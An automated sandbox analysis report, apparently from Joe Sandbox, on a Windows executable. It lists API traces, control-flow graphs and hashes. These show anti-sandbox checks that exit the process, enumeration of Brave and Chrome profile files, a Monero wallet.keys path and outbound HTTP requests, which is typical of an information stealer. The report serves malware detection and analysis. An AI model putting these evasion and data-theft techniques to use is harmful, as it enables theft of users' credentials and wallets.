                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$pT
                        • API String ID: 507064821-2397427275
                        • Opcode ID: 9bbeff0a6c858d9cfe39af0a6b11807c8305a8a4d0c177e5009778b8d03063ce
                        • Instruction ID: 6881da4e1855348e7e60975bde5318d23cb03c0b6fa9a071bb53dfe778a9464b
                        • Opcode Fuzzy Hash: 9bbeff0a6c858d9cfe39af0a6b11807c8305a8a4d0c177e5009778b8d03063ce
                        • Instruction Fuzzy Hash: 78E13E71930104AACB18FBB0DC93AEEB738AB95310F50C528B51B56091EF746A39CF97

                        Control-flow Graph
                        control_flow_graph 1301 2717a0-2717cd call 27aad0 StrCmpCA 1304 2717d7-2717f1 call 27aad0 1301->1304 1305 2717cf-2717d1 ExitProcess 1301->1305 1309 2717f4-2717f8 1304->1309 1310 2719c2-2719cd call 27a800 1309->1310 1311 2717fe-271811 1309->1311 1313 271817-27181a 1311->1313 1314 27199e-2719bd 1311->1314 1316 271821-271830 call 27a820 1313->1316 1317 2718cf-2718e0 StrCmpCA 1313->1317 1318 27198f-271999 call 27a820 1313->1318 1319 2718ad-2718be StrCmpCA 1313->1319 1320 271849-271858 call 27a820 1313->1320 1321 271835-271844 call 27a820 1313->1321 1322 271913-271924 StrCmpCA 1313->1322 1323 271932-271943 StrCmpCA 1313->1323 1324 2718f1-271902 StrCmpCA 1313->1324 1325 271951-271962 StrCmpCA 1313->1325 1326 271970-271981 StrCmpCA 1313->1326 1327 27187f-271890 StrCmpCA 1313->1327 1328 27185d-27186e StrCmpCA 1313->1328 1314->1309 1316->1314 1329 2718e2-2718e5 1317->1329 1330 2718ec 1317->1330 1318->1314 1350 2718c0-2718c3 1319->1350 1351 2718ca 1319->1351 1320->1314 1321->1314 1333 271926-271929 1322->1333 1334 271930 1322->1334 1335 271945-271948 1323->1335 1336 27194f 1323->1336 1331 271904-271907 1324->1331 1332 27190e 1324->1332 1337 271964-271967 1325->1337 1338 27196e 1325->1338 1340 271983-271986 1326->1340 1341 27198d 1326->1341 1348 271892-27189c 1327->1348 1349 27189e-2718a1 1327->1349 1346 271870-271873 1328->1346 1347 27187a 1328->1347 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1340->1341 1341->1314 1346->1347 1347->1314 1355 2718a8 1348->1355 1349->1355 1350->1351 1351->1314 1355->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 002717C5
                        • ExitProcess.KERNEL32 ref: 002717D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: e2f8f04bd5576c6f31f213759077f00abf54b6f446c35292362e2b9af7785420
                        • Instruction ID: 9fc18ae148e5a1315efd0d1efe59f7c2f2c1d097aa6f2a11d9c0cd17839f0e47
                        • Opcode Fuzzy Hash: e2f8f04bd5576c6f31f213759077f00abf54b6f446c35292362e2b9af7785420
                        • Instruction Fuzzy Hash: C351A2B4A24209EFDB04EFA4D994ABE77B5FF45304F10C058E50967280D774E976CB62

                        Control-flow Graph
                        control_flow_graph 1356 277500-27754a GetWindowsDirectoryA 1357 277553-2775c7 GetVolumeInformationA call 278d00 * 3 1356->1357 1358 27754c 1356->1358 1365 2775d8-2775df 1357->1365 1358->1357 1366 2775e1-2775fa call 278d00 1365->1366 1367 2775fc-277617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 277619-277626 call 27a740 1367->1369 1370 277628-277658 wsprintfA call 27a740 1367->1370 1377 27767e-27768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00277542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0027757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0027760A
                        • wsprintfA.USER32 ref: 00277640
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$(
                        • API String ID: 1544550907-2811700069
                        • Opcode ID: 6ff629cacf273bdc27af5762c689d4fe3208ee8c4864328afda24cd06b44ea5b
                        • Instruction ID: 435193f457c8f013c06f05a3c853d7bb5fe5412cb4154c91cb4965234076545e
                        • Opcode Fuzzy Hash: 6ff629cacf273bdc27af5762c689d4fe3208ee8c4864328afda24cd06b44ea5b
                        • Instruction Fuzzy Hash: B141B4B1D14258ABDF10DFA4DC45BEEBBB8EF08700F104098F50967280D778AA54CFA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22338), ref: 002798A1
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22290), ref: 002798BA
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22278), ref: 002798D2
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22410), ref: 002798EA
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E223E0), ref: 00279903
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E290B0), ref: 0027991B
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E155B0), ref: 00279933
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E15230), ref: 0027994C
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E221A0), ref: 00279964
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22398), ref: 0027997C
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22158), ref: 00279995
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E222A8), ref: 002799AD
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E152F0), ref: 002799C5
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E221B8), ref: 002799DE
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 002611D0: ExitProcess.KERNEL32 ref: 00261211
                          • Part of subcall function 00261160: GetSystemInfo.KERNEL32(?), ref: 0026116A
                          • Part of subcall function 00261160: ExitProcess.KERNEL32 ref: 0026117E
                          • Part of subcall function 00261110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0026112B
                          • Part of subcall function 00261110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00261132
                          • Part of subcall function 00261110: ExitProcess.KERNEL32 ref: 00261143
                          • Part of subcall function 00261220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0026123E
                          • Part of subcall function 00261220: __aulldiv.LIBCMT ref: 00261258
                          • Part of subcall function 00261220: __aulldiv.LIBCMT ref: 00261266
                          • Part of subcall function 00261220: ExitProcess.KERNEL32 ref: 00261294
                          • Part of subcall function 00276770: GetUserDefaultLangID.KERNEL32 ref: 00276774
                          • Part of subcall function 00261190: ExitProcess.KERNEL32 ref: 002611C6
                          • Part of subcall function 00277850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002611B7), ref: 00277880
                          • Part of subcall function 00277850: RtlAllocateHeap.NTDLL(00000000), ref: 00277887
                          • Part of subcall function 00277850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0027789F
                          • Part of subcall function 002778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277910
                          • Part of subcall function 002778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00277917
                          • Part of subcall function 002778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0027792F
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00276AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00276AF9
                        • Sleep.KERNEL32(00001770), ref: 00276B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276B1A
                        • ExitProcess.KERNEL32 ref: 00276B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 1ba55cab43a61f11093bc095d89b34be90be61231c961e8e5ad0e7fb1d2e1811
                        • Instruction ID: 39ec8549ae9984a5e335cb684837000cf103b8234fb4c4ce5c50c1f9e9212060
                        • Opcode Fuzzy Hash: 1ba55cab43a61f11093bc095d89b34be90be61231c961e8e5ad0e7fb1d2e1811
                        • Instruction Fuzzy Hash: 43310D71920208AADB04FBF0DC57BEE7778AF45350F108528F21AA6191DF706975CFA6

                        Control-flow Graph

                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0026123E
                        • __aulldiv.LIBCMT ref: 00261258
                        • __aulldiv.LIBCMT ref: 00261266
                        • ExitProcess.KERNEL32 ref: 00261294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 4ad248fff1e50833595f9255f7e442f82a983cfd2e1ce3991060df7dfab40564
                        • Instruction ID: e5bcb6720f7045c2c504581132de1c336b5a465d14888a97bd10d1bc41304f61
                        • Opcode Fuzzy Hash: 4ad248fff1e50833595f9255f7e442f82a983cfd2e1ce3991060df7dfab40564
                        • Instruction Fuzzy Hash: E60162B0D50308FAEB10DFE0CC49B9EBB78BF04701F248454EB05B62C0D77465A58B59

                        Control-flow Graph

                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00276AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00276AF9
                        • Sleep.KERNEL32(00001770), ref: 00276B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276B1A
                        • ExitProcess.KERNEL32 ref: 00276B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 551420b28bdb8899f3ca3a3b3409e0ad8666b5d2142a1568b228613ed9b8974a
                        • Instruction ID: 78784e1026ca62c51d3ddf755743518c9c1c7254602c1c615abca77fdec82ff1
                        • Opcode Fuzzy Hash: 551420b28bdb8899f3ca3a3b3409e0ad8666b5d2142a1568b228613ed9b8974a
                        • Instruction Fuzzy Hash: 1DF05E3096061AAFE700ABA0DC0ABBE7B34FB05705F10C524B50AA51C1CBF05560DE6A

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: d21ba7cd44d86ed17032b23685d6342006e595e0f6327f46412c5994a2e28104
                        • Instruction ID: 82c0710153e48a27c9584a2bf2e184bc04373ab97f6599c533bc74f08b697395
                        • Opcode Fuzzy Hash: d21ba7cd44d86ed17032b23685d6342006e595e0f6327f46412c5994a2e28104
                        • Instruction Fuzzy Hash: AD214FB5D00209ABDF14DFA4E845ADE7B75FB45320F108625F929A72C1EB706A15CF82

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 00266280: InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
                          • Part of subcall function 00266280: StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266303
                          • Part of subcall function 00266280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
                          • Part of subcall function 00266280: HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
                          • Part of subcall function 00266280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
                          • Part of subcall function 00266280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002663D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: be087de94e7c9b05c5b3be31f60b972418e40641b30777920bef42a1de9575e8
                        • Instruction ID: 6146604f8abd2727b8776d895de40410f2668244b7b63afe6dea7fd66cb0e372
                        • Opcode Fuzzy Hash: be087de94e7c9b05c5b3be31f60b972418e40641b30777920bef42a1de9575e8
                        • Instruction Fuzzy Hash: 6E11EF30930148A6CB14FF74DD52AED7778AF90310F808168F81E5A592EF746B26CF96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0027792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: af2bdd04d571d6b243edf45295aed15c937901b780d24468494973578043c3dd
                        • Instruction ID: cf25fbfb8fe9da6fd21f27a4ddcda53a776f69dd0b11d49d8e0d1c0f39c008fd
                        • Opcode Fuzzy Hash: af2bdd04d571d6b243edf45295aed15c937901b780d24468494973578043c3dd
                        • Instruction Fuzzy Hash: 870186B1915205EBC700DF94DD45BAABBB8FB05B11F104229F645E3280C3785914CBA2
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0026112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00261132
                        • ExitProcess.KERNEL32 ref: 00261143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: aa1c7e72efe842cbecb6f3a807516ff979c0ddc39882f246f44a00472261cc45
                        • Instruction ID: 391483ec326bd2ed3834141aceebbf8a8de35e2d3eab6315021b7ffe1255eaa2
                        • Opcode Fuzzy Hash: aa1c7e72efe842cbecb6f3a807516ff979c0ddc39882f246f44a00472261cc45
                        • Instruction Fuzzy Hash: 41E0E670955308FFE7506BA09D0AB1D7A78AB05B01F504054F709B61D0D7B56A60DA9D
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002610B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002610F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: a3570561103b4cb47c4b7b208b816628e68cd1386ed1a29ed7a86061ba491a70
                        • Instruction ID: 1fda90b527a63778324330d8c176fda760a3728e7f196fbebb219c753f2b40bb
                        • Opcode Fuzzy Hash: a3570561103b4cb47c4b7b208b816628e68cd1386ed1a29ed7a86061ba491a70
                        • Instruction Fuzzy Hash: DAF0E971641204BBEB149AA49C49FBBB7D8D705715F300458F904E7280D671AE54CA54
                        APIs
                          • Part of subcall function 002778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277910
                          • Part of subcall function 002778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00277917
                          • Part of subcall function 002778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0027792F
                          • Part of subcall function 00277850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002611B7), ref: 00277880
                          • Part of subcall function 00277850: RtlAllocateHeap.NTDLL(00000000), ref: 00277887
                          • Part of subcall function 00277850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0027789F
                        • ExitProcess.KERNEL32 ref: 002611C6
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: c045db4c2516daf9172d47dd6147123e6b163b3298c7eec93a6801258b615389
                        • Instruction ID: e2461ce57f54f8b519532e9c83c9fd477a0135bc6122d4c78c638b1d6b1dd066
                        • Opcode Fuzzy Hash: c045db4c2516daf9172d47dd6147123e6b163b3298c7eec93a6801258b615389
                        • Instruction Fuzzy Hash: E3E0ECA596420253CB0077B0AC0AB2A369C5B16345F084434BA0D92542FA39F870D96A
                        APIs
                        • wsprintfA.USER32 ref: 002738CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 002738E3
                        • lstrcat.KERNEL32(?,?), ref: 00273935
                        • StrCmpCA.SHLWAPI(?,00280F70), ref: 00273947
                        • StrCmpCA.SHLWAPI(?,00280F74), ref: 0027395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00273C67
                        • FindClose.KERNEL32(000000FF), ref: 00273C7C
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 460cb97b8f5bce807856cc52b4c3bc26d8672aed5bfe37841bbfa2d4e2ec262a
                        • Instruction ID: fb3908dc84e325511377773689372ea2c324511e6faa1fd427051366d5079172
                        • Opcode Fuzzy Hash: 460cb97b8f5bce807856cc52b4c3bc26d8672aed5bfe37841bbfa2d4e2ec262a
                        • Instruction Fuzzy Hash: 83A174B19102199BDB64EF64CC85FEE7778BF49300F048598E60D96181EB749BA4CF62
                        APIs
                        • wsprintfA.USER32 ref: 0027492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00274943
                        • StrCmpCA.SHLWAPI(?,00280FDC), ref: 00274971
                        • StrCmpCA.SHLWAPI(?,00280FE0), ref: 00274987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00274B7D
                        • FindClose.KERNEL32(000000FF), ref: 00274B92
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*$(
                        • API String ID: 180737720-1975300440
                        • Opcode ID: a71edaa46a60bcd08417de827447ad33041c8c3410f567be8144d6ae7420fb22
                        • Instruction ID: 912ce0247b3b45c4521c01d78fe222c724c06a7da759d36d1d44988ef6571c38
                        • Opcode Fuzzy Hash: a71edaa46a60bcd08417de827447ad33041c8c3410f567be8144d6ae7420fb22
                        • Instruction Fuzzy Hash: A96167B5910218ABCB60FFA0DC85EEA777CBB49700F048598B60D96140EF74EBA5CF95
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00280B32,00280B2B,00000000,?,?,?,002813F4,00280B2A), ref: 0026BEF5
                        • StrCmpCA.SHLWAPI(?,002813F8), ref: 0026BF4D
                        • StrCmpCA.SHLWAPI(?,002813FC), ref: 0026BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0026C7D1
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 2f9eec7a44fe343372f1ceda5dddc94c492305cda074f782b071b023859759f1
                        • Instruction ID: 4d98d49100e8fccc1ddfe80929056de65d120450ba69c573101a2886a02e8995
                        • Opcode Fuzzy Hash: 2f9eec7a44fe343372f1ceda5dddc94c492305cda074f782b071b023859759f1
                        • Instruction Fuzzy Hash: FD4254729201049BCB14FB70DD96EEE737CAF94310F408568B90E96181EF34AB69CF96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00274580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00274587
                        • wsprintfA.USER32 ref: 002745A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 002745BD
                        • StrCmpCA.SHLWAPI(?,00280FC4), ref: 002745EB
                        • StrCmpCA.SHLWAPI(?,00280FC8), ref: 00274601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0027468B
                        • FindClose.KERNEL32(000000FF), ref: 002746A0
                        • lstrcat.KERNEL32(?,00E2E928), ref: 002746C5
                        • lstrcat.KERNEL32(?,00E2DAF0), ref: 002746D8
                        • lstrlen.KERNEL32(?), ref: 002746E5
                        • lstrlen.KERNEL32(?), ref: 002746F6
                        Strings
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*$(
                        • API String ID: 671575355-3827042449
                        • Opcode ID: f5c3dbfc2e39d314294f0ddd028cb51a88c93651c79001d4a141faa44332c80a
